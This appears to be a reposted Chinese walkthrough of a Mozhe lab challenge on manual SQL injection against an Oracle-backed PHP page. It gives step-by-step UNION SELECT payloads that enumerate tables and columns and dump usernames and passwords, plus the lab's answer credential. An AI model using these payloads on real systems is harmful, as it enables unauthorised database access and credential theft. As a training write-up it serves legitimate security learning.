2. 程式人生 > 實用技巧 >墨者_SQL手工注入漏洞測試(Oracle資料庫)

墨者_SQL手工注入漏洞測試(Oracle資料庫)

阿新 發佈:2020-10-21

靶場:

https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

背景介紹

安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PHP程式碼對客戶端提交的引數未做任何過濾。盡情的練習SQL手工注入吧。

實訓目標

1.掌握SQL注入原理;
2.瞭解手工注入的方法;
3.瞭解Oracle的資料結構;
4.瞭解字串的MD5加解密;

解題方向

手工進行SQL注入測試,獲取管理密碼登入。

解題思路:

1、找到注入點/new_list.php?id=1

2、判斷欄位數,此處是2

http://219.153.49.228:48612/new_list.php?id=1 order by 2 //頁面正常

http://219.153.49.228:48612/new_list.php?id=1 order by 3 //頁面為空

3、判斷回顯

?id=-1 union select '1','2' from dual

4、我們需要的是使用者的賬號密碼,因此直接查詢存在users字樣的表名

?id=-1 union select (select table_name from all_tables where rownum=1 and table_name like '%user%'),'null' from dual

5、獲取表中列名

?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'null' from dual

?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'null' from dual

6、獲取資料

?id=-1 union select user_name,user_pwd from "sns_users"

?id=-1 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

得到兩組使用者名稱和密碼,第一組不行,第二組登入,得到key

mozhe/926173

相關推薦

_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師""最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

學院-SQL手工注入漏洞測試(Oracle資料庫)

學院-SQL手工注入漏洞測試(Oracle資料庫) 前言   靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

學院-SQL過濾字元後手工注入漏洞測試(第3題)

學院-SQL過濾字元後手工注入漏洞測試(第3題) 前言   一段時間沒做SQL注入的題目了,更一題SQL。

學院_CMS系統漏洞分析溯源(第4題)

靶場: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介紹 ASPCMS是完全開源的一套CMS建站系統,主要面向企業進行快速的建造簡潔,高效,易用,安全的公司企業網站,

學院—命令注入執行分析—兩種解法

一.解題思路 利用管道符構造命令 二.操作步驟 解法一 1.測試127.0.0.1能否返回正常資料

WEB安全-SQL注入漏洞測試(時間盲注)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了

學院-命令注入執行分析

命令執行漏洞   1、命令執行(Command Execution)漏洞即黑客可以直接在Web應用中執行系統命令,從而獲取敏感資訊或者拿下shell許可權。

SQL注入漏洞測試

測試背景與環境說明: 公司的監控系統對於使用者登入/退出、許可權修改、重要的操作都會記錄審計日誌,日誌儲存在postgres資料庫中。此外,還有一個提供審計記錄查詢的客戶端工具,介面如下,其中過濾輸入框可以輸入

學院靶場-uWSGI 漏洞復現

 漏洞原理介紹: uWSGI是一款Web應用程式伺服器,它實現了WSGI、uwsgi和http等協議。uWSGI 2.0.17之前版本中存在路徑遍歷漏洞,該漏洞源於程式沒有正確的處理DOCUMENT_ROOT檢測。攻擊可通過傳送帶有‘..’序列的特

sqlite手工注入+學院靶場

其他資料庫手工注入靶場都是一次1幣,這個靶場居然一次5幣!!!    懷著我倒要看看它到底有什麼神奇的心思開啟。其實也不是,由於我最熟悉就是sqlite資料庫,mysql的手工注入我雖然差不多懂了個七七八八,但是

學院--靶場篇】題目十八:日誌檔案分析溯源(SQL注入IP地址)

日誌檔案分析溯源(SQL注入IP地址) 難易程度:一顆星 分類:電子資料取證 標籤:日誌分析電子資料資料分析

學院WebShell檔案上傳漏洞分析溯源

** 1.第一題 ** 編寫一句話木馬,然後上傳檔案,改檔案不可上傳,改字尾為php5然後用菜刀連線連線成功開啟html,得到flag**

學院靶場--檔案上傳漏洞記錄

 靶場:學院靶場 攻擊環境:kali2021+weevely(kali整合的) 啟動靶場:    首先,我們試一試是否可以直接傳php檔案。

SQL注入漏洞過程例項及解決方案

程式碼示例: public class JDBCDemo3 { public static void demo3_1(){ boolean flag=login(\"aaa\' OR \' \",\"1651561\");//若已知使用者名稱,用這種方式便可不用知道密碼就可登陸成功

SSTI-服務端模板注入漏洞

原理: 服務端模板注入是由於服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而導致了敏感資訊洩露、程式碼執行、GetShell 等問題。其

mssql 手工注入流程小結

對於MSSQL的注入點,無外乎這三種許可權:SA,DB_OENER,PUBLIC。SA(System Admin)許可權我們可以直接執行命令,DB_OENER許可權的話,我們可以找到WEB的路徑,然後用備份的方式得到webshell,有時也可以對登入檔進行

Drupal<7.32“Drupalgeddon”SQL注入漏洞(CVE-2014-3704)

一、漏洞簡介 Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊可以執行任意SQL語句,插入、修改管理員資訊,甚至執行任意程式碼。

用友GRP-u8 注入漏洞復現

用友GRP-u8 注入漏洞復現 一、漏洞描述 用友GRP-u8存在XXE漏洞,該漏洞源於應用程式解析XML輸入時沒有進位制外部實體的載入,導致可載入惡意外部檔案。

SQL注入漏洞的解決PreparedStetament

JDBCUtil 工具集 package com.imooc.jdbc.utils; import java.io.IOException; import java.io.InputStream;